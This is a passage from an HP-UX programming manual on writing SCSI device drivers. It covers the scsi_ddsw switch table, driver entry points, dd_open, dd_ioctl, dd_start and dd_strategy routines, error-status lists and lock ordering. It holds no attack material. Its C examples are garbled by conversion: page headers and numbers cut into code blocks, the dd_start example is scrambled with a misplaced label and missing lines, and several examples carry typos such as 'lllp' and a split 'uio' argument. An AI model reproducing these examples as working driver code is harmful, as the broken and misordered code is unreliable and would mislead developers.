The `wsio_drv_info_t` structure ties the preceding three together. See "The `wsio_drv_info_t` Structure Type" on page 86, Chapter 5, for further details.
details.
```c
static wsio_drv_info_t mydriver_wsio_info =
{
&mydriver_info,
&mydriver_ops,
&mydriver_data,
};
```
SCSI Driver Development, Step 3: Create the driver_install Routine
The `driver_install` routine causes the information that you created above to be installed into the I/O subsystem, specifically into the WSIO CDIO.
```c
int (*mydriver_saved_dev_init)();
int mydriver_install()
{
extern int (*dev_init)();
mydriver_saved_dev_init = dev_init;
dev_init = mydriver_dev_init;
/* register driver with WSIO and return any error */
return(wsio_install_driver(&mydriver_wsio_info));
}
```
SCSI Driver Development, Step 4:
Create the driver_dev_init() Routine
You specify the `driver_dev_init` routine from the `driver_install()` routine. The `driver_dev_init` routine calls `scsi_ddsw_init()`, which initializes some fields in the SCSI driver's device-switch table (`scsi_ddsw`). This table is independent of the kernel's device switch tables.
```c
mydriver_dev_init()
{
dev_t dev = NODEV;
/*
* Initialize mydriver_ddsw.blk_major and
* mydriver_ddsw.raw_major.
*/
scsi_ddsw_init(mydriver_open, &mydriver_ddsw);
(*mydriver_saved_dev_init)();
}
```
Setting up the Device-Switch Table (`scsi_ddsw`)
In order to use SCSI Services effectively, a SCSI driver must define its `scsi_ddsw` device-switch structure. This structure contains pointers to special `dd` routines, some of which are executed indirectly by the standard driver routines, such as `driver_read`. The structure is passed to SCSI Services routines from the `driver_open` routine, which calls the `scsi_lun_open()` SCSI Services routine.
SCSI Services has been set up to control the housekeeping and other processing in the SCSI interface. Therefore, you should have the standard driver routines restrict their operation to calling the appropriate SCSI Services routine, as shown in the examples in “SCSI Driver Development, Step 6: Create the Entry-Point Routines”. Special processing and customization should all be handled in the special `dd` routines.
For a summary of SCSI Services, see “SCSI Services Summary”. For more detailed information, see the HP-UX Driver Development Reference.
The `scsi_ddsw` structure is defined as follows in the header file `<sys/scsi_ctl.h>`:
---
Chapter 9 323
Writing SCSI Device Drivers
SCSI Driver Development, Step 4: Create the driver_dev_init() Routine
```
struct scsi_ddsw
{
u_char blk_major;
u_char raw_major;
int dd_lun_size;
int (*dd_open)();
void (*dd_close)();
int (*dd_strategy)();
int (*dd_read)();
int (*dd_write)();
int (*dd_ioctl)();
int (*dd_start)();
int (*dd_done)();
int (*dd_pass_thru_okay)();
int (*dd_pass_thru_done)();
int (*dd_ioctl_okay)();
struct buf (*dd_start_list);
int dd_status_cnt;
ubit32 dd_flags;
wsio_drv_info_t *wsio_drv;
};
```
The entries are described below.
**blk_major**
Block and character major numbers; specify them as NODEV. They are initialized by `scsi_ddsw_init()` when it is called from your `driver_dev_init()` routine.
**raw_major**
**dd_lun_size**
The number of bytes to be allocated and attached to the open device tree when `driver_open()` is first executed.
**dd_open()**
**dd_close()**
**dd_strategy()**
**dd_read()**
**dd_write()**
**dd_ioctl()**
Pointers to underlying driver-specific routines. When the corresponding `driver Routine` is called by the kernel and transfers control to SCSI Services, SCSI Services performs certain overhead operations and calls these routines for driver-specific operations.
**dd_start()**
Driver specific start routine
**dd_done()**
Driver specific post I/O processing
dd_pass_thru_okay() Driver specific control of pass through I/O
dd_pass_thru_done() Driver specific notation of pass through I/O
dd_ioctl_okay() Disallow ioctl commands through the pass through driver
dd_flags Flag bits, currently only DD_DD defined.
Here is an example of an initialized declaration of the scsi_ddsw:
The first example is the declaration of your driver’s version of the dd routines that can be called by SCSI Services. The routine names are arbitrary. The names in comments are the field names of the scsi_ddsw structure.
```c
int mydriver_dd_open(); /* dd_open */
void mydriver_dd_close(); /* dd_close */
int mydriver_dd_strategy(); /* dd_strategy */
int mydriver_dd_read(); /* dd_read */
int mydriver_dd_write(); /* dd_write */
int mydriver_dd_ioctl(); /* dd_ioctl */
struct buf mydriver_dd_start(); /* dd_start */
int mydriver_dd_done(); /* dd_done */
int mydriver_dd_pass_thru_okay(); /* dd_pass_thru_okay */
int mydriver_dd_pass_thru_done(); /* dd_pass_thru_done */
int mydriver_dd_ioctl_okay(); /* dd_ioctl_okay */
```
The following example shows the scsi_ddsw structure. Specify NULL for routines that are not defined (that is, that you are not using). The first two fields specify the block and character major numbers; they are filled in by the call in driver_dev_init() to the SCSI Services routine scsi_ddsw_init(). The last field points to the wsio_drv_info_t structure that you defined in “SCSI Driver Development, Step 2: Set Up Structures”. The first name in each comment is the field name of the scsi_ddsw structure element.
```c
struct scsi_ddsw mydriver_ddsw =
{
NODEV, /* blk_major - mydriver_dev_init sets */
NODEV, /* raw_major - mydriver_dev_init sets */
sizeof(struct mydriver_lun), /* dd_lun_size */
mydriver_dd_open, /* dd_open */
mydriver_dd_close, /* dd_close */
mydriver_dd_strategy, /* dd_strategy */
NULL, /* dd_read */
NULL, /* dd_write */
mydriver_dd_ioctl, /* dd_ioctl */
};
```
Writing SCSI Device Drivers
SCSI Driver Development, Step 4: Create the driver_dev_init() Routine
mydriver_dd_start, /* dd_start */
mydriver_dd_done, /* dd_done */
mydriver_dd_pass_thru_okay, /* dd_pass_thru_okay */
mydriver_dd_pass_thru_done, /* dd_pass_thru_done */
mydriver_dd_ioctl_okay, /* dd_ioctl_okay */
mydriver_dd_status_list, /* dd_status_list */
sizeof(mydriver_dd_status_list)/
sizeof(mydriver_dd_status_list[0]),
/* dd_status_cnt */
mydriver_dd_flags, /* dd_flag bits DD/DDG */
&mydriver_wsio_info /* For Diagnostics Logging;
NULL means errors print in dmesg */
};
SCSI Driver Development, Step 5: Analyze Multiprocessor Implications
You need to make your device driver MP safe, regardless of whether it is to operate an MP platform or not. SCSI Services make use of the kernel’s locking facilities, so all drivers that use SCSI Services must use the data-protection routines the kernel provides.
Your drivers must do the following:
• Set the C_MGR_IS_MP flag in the d_flags field of the driver’s drv_ops_t structure.
• Set the DRV_MP_SAFE flag in the flags field of the drv_info_t structure.
• Use the driver semaphore, driver lock, LUN lock, and target lock as necessary to provide MP protection. Refer to the defines and structures in /usr/include/sys/scs_ctl.h for details. This is the largest task, and involves looking at the code and determining whether there are data references that must be protected and which locks and semaphores must be used to protect the references. (See “Data Protection for SCSI Drivers” for more details.)
• Build a kernel with your driver.
• Test your driver on a single processor (UP) system with a debug kernel if available. (You can also test it on an MP system.)
SCSI Driver Development, Step 6: Create the Entry-Point Routines
For many of the entry points, SCSI Services perform much of the work. If you use `physio()`, `scsi_strategy()` will be called by your driver's `driver_strategy` routine. Hence, you need not create the underlying `ddsw->dd_read()` and `ddsw->dd_write()` routines. However, if your driver calls `scsi_strategy()`, you must specify a `ddsw->dd_strategy()` routine.
The `scsi_strategy()` routine cannot block because it can be called on the Interrupt Control Stack (ICS) by a `bp->b_call` routine.
**driver_open() Routine**
```c
mydriver_open(dev, oflags)
dev_t dev;
int oflags;
{
return (scsi_lun_open(dev, &mydriver_ddsw, oflags));
}
```
**driver_close() Routine**
```c
mydriver_close(dev)
dev_t dev;
{
return scsi_lun_close(dev);
}
```
**driver_read() Routine**
```c
mydriver_read(dev, uio)
dev_t dev;
struct uio *uio;
{
return scsi_read(dev, uio);
}
```
**driver_write() Routine**
mydriver_write(dev, uio)
dev_t dev;
struct uio *uio;
{
return scsi_write(dev, uio);
}
**driver_strategy() Routine**
The `driver_strategy()` routine does not return anything. It records errors in `bp->b_error`.
mydriver_strategy(bp)
struct buf *bp;
{
scsi_strategy(bp);
}
**driver_psize() Routine**
This example assumes that `driver_psize()` is never called when the device is closed. Note the use of the SCSI Services `m_scsi_lun()` function.
mydriver_psize(dev)
dev_t dev;
{
struct scsi_lun *lp = m_scsi_lun(dev);
struct mydriver_lun *llp = lp->dd_lun;
int rshift, nblks, size;
nblks = llp->nblks;
rshift = llp->devb_lshift;
size = rshift > 0 ? nblks >> rshift : nblks << -rshift;
return size;
}
**driver_ioctl() Routine**
mydriver_ioctl(dev, cmd, data, flags)
dev_t dev;
Writing SCSI Device Drivers
SCSI Driver Development, Step 6: Create the Entry-Point Routines
```c
int cmd;
int *data;
int flags;
{ return scsi_ioctl(dev, cmd, data, flags);
}
```
SCSI Driver Development, Step 7: Error Handling
You can specify one optional list in the driver's `scsi_ddsw`: `dd_status_list[]`. SCSI services access this optional list when an I/O completion occurs on the driver's SCSI LUN. The SCSI Services internal routine `scsi_status_action()` determines what to do based upon this list.
The following are examples of very simple lists:
```c
struct sense_action mydriver_sense_list[] = {
{ S_GOOD, S_CURRENT_ERROR, S_RECOVERRED_ERROR, SA_ANY, SA_ANY, mydriver_check_residue, SA_DONE | SA_LOG_IT_ALWAYS, 0 },
{ SA_ANY, SA_ANY, SA_ANY, SA_ANY, SA_ANY, scsi_action, SA_DONE + SA_LOG_IT_NEVER, EIO }
};
```
```c
struct status_action mydriver_status_list[] = {
{ S_GOOD, scsi_action, SA_DONE + SA_LOG_IT_NEVER, 0 },
{ S_CHECK_CONDITION, scsi_sense_action, (int) mydriver_sense_list, sizeof(mydriver_sense_list) / sizeof(mydriver_sense_list[0]) },
{ S_CONDITION_MET, scsi_action, SA_DONE + SA_LOG_IT_NEVER, 0 },
{ S_INTERMEDIATE, scsi_action, SA_DONE + SA_LOG_IT_NEVER, 0 },
{ S_I_CONDITION_MET, scsi_action, SA_DONE + SA_LOG_IT_NEVER, 0 },
{ SA_ANY, scsi_action, SA_DONE + SA_LOG_IT_ALWAYS, EIO }
};
```
Your driver can specify its own routines for handling errors, and can break down errors for more granularity. You can access the Pass-Thru Driver status using the driver's `dd_pass_thru_done()` routine, described in “SCSI Driver Development, Step 8: Underlying Routines”.
SCSI Driver Development, Step 8: Underlying Routines
This is where the driver can be as complex as you desire, or as the device requires. The `scsi_lun_open()` routine ensures that the bus, target, and LUN of the driver’s device are open and able to handle I/O. Specific requirements for the device itself should be addressed in the driver’s `ddsw->dd_open()` routine. The same principle applies for `close`, `read`, `write`, and so on.
The call graph in Figure 9-1, “Call Graph of SCSI Routines and Services,” shows how these underlying routines and SCSI services call each other. For a summary list of SCSI Services, see “SCSI Services Summary”. Detailed information on SCSI Services is provided in the HP-UX Driver Development Reference.
dd_close Routine
The `dd_close()` SCSI function, used to provide driver-specific processing during close is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_close` field of the `scsi_ddsw` structure.
If this routine is defined in the `scsi_ddsw` structure, it is called to perform the actual device close processing. For example, for the `scsi_disk` driver, the `sd_close()` function performs the Test Unit
Ready and Allow Media Removal commands.
**Conditions**
dd_close() is called from scsi_lun_close() in a process context. The open/close lun semaphore is held when the dd_close() function is called. dd_close() is not called from within a critical section; it may block.
**Declaration**
```c
void dd_close(
dev_t dev
);
```
**Parameters**
*dev* The device number.
**Return Values**
dd_close() does not return a value.
**Example**
```c
#include <sys/scsi_ctl.h>
#define ST_GEOM_LOCKED 0x00000002
void mydriver_dd_close(dev);
dev_t dev;
{
struct scsi_lun *lp = m_scsi_lun(dev);
struct mydriver_lun *llp = lp->dd_lun;
if (dd_blk_open_cnt(lp) == 1) {
scsi_lun_lock(lp);
lllp->state &= ~ST_GEOM_LOCKED;
scsi_lun_unlock(lp);
}
}
```
**dd_ioctl Routine**
The dd_ioctl() routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the dd_ioctl field of the scsi_ddsw structure.
If this routine exists in the `scsi_ddsw` structure, it is called by `scsi_ioctl()` if the ioctl command remains unsatisfied by the choices provided within that SCSI Services procedure. If `dd_ioctl()` does not exist when called, `scsi_ioctl()` returns an error.
Examine the ioctl commands provided by SCSI Services in `scsi_ioctl()`, and implement any additional commands needed in your `dd_ioctl()` routine.
It is in `dd_ioctl()` and in `dd_open()`, if implemented, that some of the more specialized features of SCSI Services may be useful, as listed below.
- `scsi_cmd()`
- `scsi_init_inquiry_data()`
- `scsi_mode_sense()`
- `scsi_mode_fix()`
- `scsi_mode_select()`
- `scsi_wr_protect()`
**Conditions**
`dd_ioctl()` is called from `scsi_ioctl()` in a process context. It is not called from within a critical section; it may block.
**Declaration**
```c
int dd_ioctl (
dev_t dev,
int cmd,
caddr_t data,
int flags
);
```
**Parameters**
- `cmd` The command word
- `data` Pointer to the commands arguments
- `dev` The device number
- `flags` The file-access flags
Return Values
dd_ioctl() is expected to return the following values:
- **0**: Successful completion.
- **<0**: Error. Value is expected to be an errno.
Example
```c
#include <sys/scsi.h>
#include <sys/scsi_ctl.h>
mydriver_dd_ioctl (dev_t dev,
int cmd,
int *data,
int flags);
{
struct scsi_lun *lp = m_scsi_lun(dev);
struct mydriver_lun *llp = lp->dd_lun;
struct scsi_tgt *tp = lp->tgt;
struct scsi_bus *busp = tp->bus;
struct inquiry_2 *inq = &lp->inquiry_data.inq2;
disk Describe_type *ddt;
int size = (cmd & IOCSIZE_MASK) >> 16;
int i;
switch (cmd & IOCCMD_MASK)
{
case DIOC_DESCRIBE & IOCCMD_MASK:
if (cmd != DIOC_DESCRIBE && size != 32)
return EINVAL;
ddt = (void *) data;
i = inq->dev_type;
bcopy(inq->product_id, ddt->model_num, 16);
ddt->intf_type = SCSI_INTF;
ddt->maxsva = llp->nblks - 1;
ddt->lgblksz = llp->blk_sz;
ddt->dev_type = i == SCSI_DIRECT_ACCESS ? DISK_DEV_TYPE
: i == SCSI_WORM ? WORM_DEV_TYPE
: i == SCSI_CDROM ? CDROM_DEV_TYPE
: i == SCSI_MO ? MO_DEV_TYPE
: UNKNOWN_DEV_TYPE;
if (HP_MO(lp))
/* Shark lies; fix it to match Series800 */
```
ddt->dev_type = MO_DEV_TYPE;
if (size == 32)
return 0;
/* WRITE_PROTECT for SCSI WORM */
ddt->flags = (llp->state & LL_WP) ? WRITE_PROTECT_FLAG :
0;
return 0;
}
switch (cmd) {
case SIOC_CAPACITY:
((struct capacity *) data)->lba = llp->nblks;
((struct capacity *) data)->blksz = llp->blk_sz;
return 0;
case SIOC_GET_IR:
return mydriver_wce(dev, SIOC_GET_IR, data);
case SIOC_SET_IR:
if (!(flags & FWRITE) && !suser())
return EACCES;
if (*data & ~0x1)
return EINVAL;
return mydriver_wce(dev, SIOC_SET_IR, data);
case SIOC_SYNC_CACHE:
if (llp->state & LL_IR)
return mydriver_sync_cache(dev);
else
return 0; /* IR not on, just return */
case DIOC_CAPACITY:
*data = (llp->devb_lshift > 0 ? llp->nblks >> llp->devb_lshift :
llp->nblks << -(llp->devb_lshift));
return 0;
...
default:
return EINVAL;
}
**dd_ioctl_okay Routine**
The `dd_ioctl_okay()` SCSI function is provided by the driver writer. It
Writing SCSI Device Drivers
SCSI Driver Development, Step 8: Underlying Routines
can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_ioctl_okay` field of the `scsi_ddsw` structure.
`dd_ioctl_okay()` disallows all ioctl commands through the pass-through driver that are not explicitly allowed by any nonpass-through driver that has the device open concurrently.
**Conditions**
`dd_ioctl_okay()` is called from `sctl_ioctl()` in a process context. It is called within a critical section; it may not block.
**NOTE**
It is desirable to allow `SIOC_INQUIRY` for the pass-through driver at all times. Therefore, `SIOC_INQUIRY` is allowed by default (if there is no `dd_ioctl_okay()` routine). `SIOC_INQUIRY` is also always allowed if it will not result in I/O (`lp->inquiry_sz > 0`), because it does not affect the nonpass-through device driver in any way.
**Declaration**
```c
int dd_ioctl_okay (
dev_t dev,
int cmd,
caddr_t data,
int flags
);
```
**Parameters**
- `cmd` The command word
- `data` Pointer to the commands arguments
- `dev` The device number
- `flags` The file-access flags
**Return Values**
`dd_ioctl_okay()` is expected to return the following values:
- `PT_OKAY` Successful completion.
- `0` Error.
Examples
```c
#include <sys/scsi_ctl.h>
mydriver_dd_ioctl_okay (
dev_t dev,
int cmd,
void *data,
int flags
);
{
return PT_OKAY;
}
```
dd_open Routine
The `dd_open()` SCSI function is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_open` field of the `scsi_ddsw` structure.
If this routine exists in the `scsi_ddsw` structure, it is called to perform the actual device “open” processing.
As an example the disk driver's `sd_open()` calls `disksort_init_queue()` for the lun's lun_disk_queue. It calls `scsi_init_inquiry_data()` to set the target state for SDTR and WDTR and send the Start Unit, Test Unit Ready, Prevent Media Removal, and Read Capacity commands, if appropriate, for the type of disk being opened.
This routine can be as complicated as you need to ensure the device is properly open the first time (ensured by checking `dd_open_cnt`). Calling the SCSI Service `scsi_init_inquiry_data()` is reasonable, as is performing Test Unit Ready. Changing state in the `scsi_lun` or target structures requires protection.
Conditions
`dd_open()` is called from `scsi_lun_open()` in a process context. The open/close lun_semaphore is held when `dd_open()` is called. `dd_open()` is not called within a critical section; it may block.
Declaration
```c
dd_open (
dev_t dev,
int cmd,
void *data,
int flags
);
```
Writing SCSI Device Drivers
SCSI Driver Development, Step 8: Underlying Routines
```c
int oflags
)
Parameters
dev The device number
oflags The flags passed in the open call
Return Values
dd_open() is expected to return the following values:
0 Successful completion.
<>0 Error. The value is expected to be an errno value.
Examples
#include <sys/scsi_ctl.h>
mydriver_dd_open(dev, oflags)
dev_t dev;
int oflags;
{
struct scsi_lun *lp = m_scsi_lun(dev);
struct mydriver_lun *llp = lp->dd_lun;
struct scsi_tgt *tp = lp->tgt;
struct inquiry_2 *inq = &lp->inquiry_data.inq2;
struct capacity cap;
u_char cdb[12];
struct sense_hdr *hd;
struct block_desc *bd;
struct caching_page *c_pd;
struct error_recovery *e_pd;
int ret_size, bpb, error, x;
/*
* Only first opens are interesting.
*/
if (dd_open_cnt(lp) > 1)
return 0;
...
/*
* Inquiry.
*
* Call the routine provided by services to do any
necessary synchronization with the pass-through driver. Success here does not imply that there is no more pending sense data. In fact, the SCSI-2 standard encourages devices not to give Check Condition status on Inquiry, but to defer it until a subsequent command. Also, if the inquiry data had already been cached as a result of a pass-through driver open or SIOC_INQUIRY, this may not even result in I/O.
```
if (error = scsi_init_inquiry_data(dev))
return error;
```
```
/*
* Needs protection at LUN and Tgt.
*/
scsi_lun_lock(lp);
scsi_tgt_lock(tp);
tp->state |= T_ENABLE_SDTR;
/*
* Allow an incomplete open if this is a raw device.
*/
if (major(dev) == mydriver_ddsw.raw_major)
{
scsi_lun_lock(lp);
lp->state |= L_DISABLE_OPENS;
scsi_lun_unlock(lp);
return 0;
}
```
... return error;
}
...
**dd_pass_thru_done Routine**
The `dd_pass_thru_done()` routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_pass_thru_done` field of the `scsi_ddsw` structure.
If this routine exists in the `scsi_ddsw` structure, SCSI Services executes it on completion of a pass-through I/O. It allows the device driver to make note of any I/Os which have occurred and any resulting status and/or sense data.
The `dd_pass_thru_done()` function is called from within a critical section; it is not permitted to block.
**Declaration**
```c
int dd_pass_thru_done (
struct buf *bp
);
```
**Parameters**
- `bp` buf structure
**Return Values**
`dd_pass_thru_done()` is declared as returning `int`; however, the return is not used by SCSI services.
**dd_pass_thru_okay Routine**
The `dd_pass_thru_okay()` routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_pass_thru_okay` field of the `scsi_ddsw` structure.
If a device is opened by a nonpass-through device driver and the driver specifies a `dd_pass_thru_okay()` entry point in its `scsi_ddsw` structure, then the driver has complete control over what pass-through I/Os are allowed. If the driver does not specify a `dd_pass_thru_okay()` entry point, then pass-through I/Os are not allowed.
The `dd_pass_thru_okay()` function is called from within a critical section and may not block.
**Declaration**
```c
dd_pass_thru_okay (
dev_t dev,
struct sctl_io *sctl_io
);
```
**Parameters**
- `dev` The device number
- `sctl_io` Struct containing ioctl information
**Return Values**
`dd_pass_thru_okay()` is expected to return the following values:
- `PT_OKAY` Successful completion.
- `0` Error.
**Example**
```c
#include <sys/scsi_ctl.h>
mydriver_dd_pass_thru_okay(dev, sctl_io)
{
return PT_OKAY;
}
```
**dd_read Routine**
The `dd_read()` routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_read` field of the `scsi_ddsw` structure.
If this routine exists in the `scsi_ddsw` structure, it is called instead of `physio()` by `scsi_read()`.
`dd_read()` is called in a process context. It is not called from within a critical section; it may block.
Declaration
```c
int dd_read (
dev_t dev,
struct uio *uio
);
```
Parameters
- **dev**
The device number
- **uio**
Structure containing transfer information
Return Values
- **dd_read()** is expected to return the following values:
- **0**
Successful completion.
- **<>0**
Error. The value is expected to be an `errno` value.
Example
```c
mydriver_dd_read(dev, uio)
dev_t dev;
struct uio *uio;
{
struct scsi_lun *lp = m_scsi_lun(dev);
struct sf_lun *llp = lp->dd_lun;
int error;
scsi_lun_lock(lp);
while (llp->state & ST_GEOM_SEMAPHORE)
scsi_sleep(lp, &llp->state, PRIBIO);
llp->state |= ST_GEOM_SEMAPHORE;
scsi_lun_unlock(lp);
sf_update_geometry(dev);
error = physio(scsi_strategy, NULL, dev, B_READ, minphys, uio);
scsi_lun_lock(lp);
llp->state &= ~ST_GEOM_SEMAPHORE;
scsi_lun_unlock(lp);
wakeup(&llp->state);
return error;
```
dd_start Routine
The dd_start() routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the dd_start field of the scsi_ddsw structure.
If this routine exists in the scsi_ddsw structure, it is called by scsi_start() to allow the driver to perform any necessary processing prior to calling scsi_start_nexus().
The dd_start() function is called in the process and interrupt context from within a critical section in scsi_start(). dd_start() is not permitted to block.
The critical section in scsi_start(), from where the dd_start() function is called, is mainly protecting the scsi_lun structure and guaranteeing that lp->n_scbs is consistent with the dd_start() function starting a request or not. The critical section also protects the incrementing of n_scbs in the scsi_tgt structure and the incrementing of the SCSI subsystem unique I/O ID scsi_io_cnt.
If this routine does not exist, only “special” I/Os (B_SIOC_IO or B_SCSI_CMD) can be performed.
The driver’s dd_start() routine must dequeue the I/O from the appropriate list and perform whatever is necessary for the device to operate upon the I/O.
The parameters passed for this purpose are the lp and the scb parameters. The scb has the necessary cdb[] array for the SCSI command bytes.
Declaration
struct buf *(*d_start) dd_start (
struct scsi_lun *lp,
struct scb *scb
);
Parameters
lp The open LUN structure
scb Extra state information for I/O
Return Values
`dd_start()` is expected to return the following values:
- `struct buf *bp` Successful completion.
- `NULL` Error.
Example
```c
#include <sys/scsi_ctl.h>
struct buf *mydriver_dd_start(lp, scb)
struct scsi_lun *lp;
struct scb *scb;
{
struct mydriver_lun *llp = lp->dd_lun;
struct buf *bp;
struct scb *head_scb, *scb_forw, *scb_back;
int nblks, blkno, x;
int lshift = llp->devb_lshift;
/*
* We could be more granular with locks, but
* that would most likely cause too much
* overhead getting/releasing locks.
*/
scsi_lun_lock(lp);
if ((bp = mydriver_dequeue(lp)) == NULL)
goto start_done;
nblks = bp->b_bcount >> llp->log2_blk_sz;
if (bp->b_offset & DEV_BMASK)
blkno = (unsigned) bp->b_offset >> llp->log2_blk_sz;
else
blkno = (unsigned) (lshift > 0
? bp->b_blkno << lshift
: bp->b_blkno >> -lshift);
scb->cdb[0] = (bp->b_flags & B_READ)
? CMDread10
: llp->state & LL_WWV
start_done:
```
346 Chapter 9
? CMDwriteNverify
: CMDwrite10;
scb->cdb[1] = 0;
scb->cdb[2] = blkno >> 24;
scb->cdb[3] = blkno >> 16;
scb->cdb[4] = blkno >> 8;
scb->cdb[5] = blkno;
scb->cdb[6] = 0;
scb->cdb[7] = nblks >> 8;
scb->cdb[8] = nblks;
scb->cdb[9] = 0;
/* Immediate Reporting (WCE) ON */
if (llp->state & LL_IR)
if ((scb->cdb[0] == CMDwrite10) && (bp->b_flags & B_SYN)
/* Assume that scb->io_id will be set by caller within */
/* this CRIT */
if (llp->active_bp_list != NULL)
scb->io_forw = llp->active_bp_list;
*/ Queue this bp into llp->active_bp_list HEAD for */
/* tracking */
if (llp->active_bp_list != NULL)
{ scb->io_back = head_scb->io_back;
Writing SCSI Device Drivers
SCSI Driver Development, Step 8: Underlying Routines
```c
scb_forw = (void *) scb->io_forw->b_scb;
scb_back = (void *) scb->io_back->b_scb;
scb_forw->io_back = bp;
scb_back->io_forw = bp;
llp->active_bp_list = bp;
}
else
{
llp->active_bp_list = bp;
scb->io_forw = scb->io_back = bp;
}
/* Although redundant with caller, set this in case
* completion int */
bp->b_scb = (long) scb;
start_done:
scsi_lun_unlock(lp);
return bp;
}
```
**dd_strategy Routine**
The `dd_strategy()` routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_strategy` field of the `scsi_ddsw` structure.
The `dd_strategy()` routine is called by `scsi_strategy()` to perform whatever sorting or queuing the device driver requires for normal I/O. For most drivers, enqueuing to `lp->scb_q` is necessary; the `scsi_disk()` driver calls `disksort_enqueue()`.
`dd_strategy()` is called in a process (and possibly, interrupt) context; it is not allowed to block.
If the driver invokes `scsi_strategy()`, `dd_strategy()` is required. If the `dd_read()` or `dd_write()` routines are not specified, SCSI Services will assume `physio()` is to be used.
---
**NOTE**
The `scsi_strategy()` calls `dd_strategy()` holding `lun_lock`.
---
348 Chapter 9
Declaration
```
int (*dd_strategy) dd_strategy (
struct buf *bp,
struct scsi_lun *lp
);
```
Parameters
- **bp**: transfer buf header
- **lp**: scsi LUN information
Return Values
`dd_strategy()` is expected to return the following values:
- **0**: Successful completion.
- **-1**: Error.
Example
The MP protection is provided for modification of the queues. Here is an example for a tape:
```c
mydriver_dd_strategy(bp)
struct buf *bp;
{
struct scsi_lun *lp = m_scsi_lun(bp->b_dev);
struct st_lun *llp = lp->dd_lun;
struct st_static_lun *sllp = llp->static_data;
DB_ASSERT(!(bp->b_flags & B_ERROR));
sllp->head_pos &= ~HEAD_FORWARD;
P_LOG(bp->b_dev, READ_WRITE, bp->b_bcount, "req_size", "Request size");
/* Check for valid request size in fixed block mode */
if (llp->block_size > 0 && bp->b_bcount % llp->block_size != 0)
{
NP_LOG(bp->b_dev, READ_WRITE, llp->block_size, "blk_size", "Not a multiple of block size");
bp->b_flags |= B_ERROR;
bp->b_error = ENXIO;
biodone(bp);
}
```
A SCSI disk does not use the `lp->scb_q`. Instead, a service from the File System is used, `disksort()`. The following is an example of its use:
```c
mydriver_dd_strategy(bp)
struct buf *bp;
{
dev_t dev = bp->b_dev;
struct scsi_lun *lp = m_scsi_lun(dev);
struct mydriver_lun *llp = lp->dd_lun;
ASSERT(!(bp->b_flags & B_ERROR));
if (bpcheck(bp, llp->nblks, llp->log2_blk_sz, 0))
return -1;
LOG(bp->b_dev, FUNC_QUEUE, bp->b_blkno, "b_blkno");
LOG(bp->b_dev, FUNC_QUEUE, bp->b_offset, "b_offset");
LOG(bp->b_dev, FUNC_QUEUE, bp->b_bcount, "b_bcount");
return mydriver_enqueue(lp, bp);
}
```
```c
mydriver_enqueue(lp, bp)
struct scsi_lun *lp;
struct buf *bp;
{
int x;
struct mydriver_lun *llp = lp->dd_lun;
struct buf *dp;
dp = &llp->lun_disk_queue;
/* set B_FIRST to get queue preference */
if (bp->b_flags & B_SPECIAL)
bp->b2_flags |= B2_FIRST;
```
/* fake b_cylin 512K per cylinder */
bp->b_cylin = (bp->b_offset >> 19);
disksort_enqueue(dp, bp);
/* Increment counters within this protection */
scsi_enqueue_count(lp, bp);
return 0;
}
Warning
dd_strategy() must exist (be defined as non-NULL in the scsi_ddsw structure) if your driver calls scsi_strategy().
dd_write Routine
The dd_write() routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the dd_write field of the scsi_ddsw structure.
If this routine exists in the scsi_ddsw structure, it is called instead of physio() by scsi_write().
This routine is called from scsi_write() in a process context. Since it is not called from within a critical section, it may block.
Declaration
int dd_write (dev_t dev,
struct uio *uio);
Parameters
dev The device number
uio Structure containing transfer information
Return Values
dd_write() is expected to return the following values:
0 Successful completion.
errno Error.
Example
```c
#include <sys/scsi_ctl.h>
#define ST_GEOM_SEMAPHORE 2
mydriver_dd_write(dev, uio)
dev_t dev;
struct uio *uio;
{
struct scsi_lun *lp = m_scsi_lun(dev);
struct sf_lun *llp = lp->dd_lun;
int error;
scsi_lun_lock(lp);
while ((llp->state & ST_GEOM_SEMAPHORE)
scsi_sleep(lp, &llp->state, PRIBIO);
llp->state |= ST_GEOM_SEMAPHORE;
scsi_lun_unlock(lp);
sf_update_geometry(dev);
error = physio(scsi_strategy, NULL, dev, B_WRITE, minphys,
ui
);
scsi_lun_lock(lp);
llp->state &= ~ST_GEOM_SEMAPHORE;
scsi_lun_unlock(lp);
wakeup(&llp->state);
return error;
}
```
Data Protection for SCSI Drivers
The SCSI Services your driver calls take the appropriate locks to provide MP protection. One thing your driver must provide is protection for accessing its own private data and any data under the domain of the SCSI Services, such as `scsi_lun`, `scsi_tgt`, `scsi_bus`, or the SCSI subsystem’s data. Locks are defined in `<sys/scsi_ctl.h>`.
Rules for Ordering Locks
The rules for ordering locks and semaphores help the kernel detect deadlocks in their use. When a thread of execution must hold more than one lock or semaphore, it must acquire them in increasing order. The order of locks and semaphores is, in ascending order:
1. LUN lock
2. Target lock
3. Bus lock
4. Subsystem lock
If a thread of execution must hold both the LUN lock and target lock at the same time, the ordering rules assert that the code must acquire the LUN lock before it acquires the target lock.
The spinlocks that are used to implement the LUN, target, bus, and subsystem locks are the normal HP-UX spinlocks.
While a thread of execution holds a lock, the processor’s interrupt level is set to SPL6, preventing I/O devices from interrupting that processor. The spinlock associated with `spl*()` services (`spi_lock`) is of lower order than practically all other locks, so code protected by a spinlock cannot call a `spl*()` routine.
Subsystem Lock
The subsystem lock protects the SCSI subsystem’s global data. Only SCSI Services access this data, so your driver should have no need for this lock.
Writing SCSI Device Drivers
Data Protection for SCSI Drivers
**Bus Lock**
Each `scsi_bus` structure has a lock associated with it that protects many of the fields in the structure. Most drivers do not need to use the bus lock, because they ordinarily do not access the information maintained in the `scsi_bus` structure.
You should be aware that some HP device drivers access the `B_EXCLUSIVE` flag in the state field of the `scsi_bus` structure.
**Target Lock**
